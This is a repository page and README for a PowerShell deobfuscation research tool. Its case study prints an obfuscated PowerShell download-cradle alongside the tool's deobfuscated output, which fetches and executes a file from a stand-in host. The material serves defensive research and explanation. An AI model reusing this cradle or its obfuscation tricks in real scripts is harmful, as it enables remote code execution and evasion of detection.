# Invoke-Deobfuscation

**Repository Path**: snowroll/invoke-deobfuscation

## Basic Information

- **Project Name**: Invoke-Deobfuscation
- **Description**: Deobfuscation tool for PowerShell
- **Primary Language**: PowerShell
- **License**: GPL-2.0
- **Default Branch**: main
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 9
- **Forks**: 1
- **Created**: 2022-03-21
- **Last Updated**: 2024-12-16

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

### Invoke-Deobfuscation

---

- Environment
    - Windows： PowerShell Shell
    - Linux: pwsh https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-linux?view=powershell-7.2
    - MacOS: pwsh https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.2


- How to use it？

    ~~~shell
    git clone https://gitee.com/snowroll/invoke-deobfuscation
    cd invoke-deobfuscation/Code
    pwsh  # Linux or MacOS
    Import-Module ./Invoke-DeObfuscation.psd1
    DeObfuscatedMain -ScriptPath0 ../Data/demo.ps1  
    ~~~

- Case Study


    - demo.ps1

        ~~~powershell
        Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h')
        $xdjmd  =   'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
        $lsffs =   '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
        $sdfs = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($xdjmd + $lsffs))
        .($psHoME[4]+$PShOmE[30]+'x') (Ne`W-oB`JeCt Net.Web`C`lient).downloadstring($sdfs)
        ~~~

    - Result

        ~~~powershell
        Write-Host hello
        $var0 = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
        $var1 = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
        $var2 = 'https://test.com/malware.txt'
        .('iex') (New-Object net.webclient).downloadstring('https://test.com/malware.txt')
        ~~~

- DataSet Request

    If you want the dataset (3346 highly obfuscated samples), please send me an email. My email address is chaihuajun@qianxin.com. There are some requirements for the email as follows.
    - You need to send me an email with a copy to both my mentor yinglingyun@qianxin.com and your mentor.
    - In the body of the email, you need to state the purpose of the dataset request and the use of the dataset.
    - Moreover, you need to clearly indicate that the results generated by the dataset will cite our paper.

    The full dataset is not public. If you would like to collaborate on research, please feel free to contact us

- Citation
    ~~~
    @inproceedings{chai2022invoke,
    title={Invoke-Deobfuscation: AST-Based and Semantics-Preserving Deobfuscation for PowerShell Scripts},
    author={Chai, Huajun and Ying, Lingyun and Duan, Haixin and Zha, Daren},
    booktitle={2022 52nd Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN)},
    pages={295--306},
    year={2022},
    organization={IEEE}
    }
    ~~~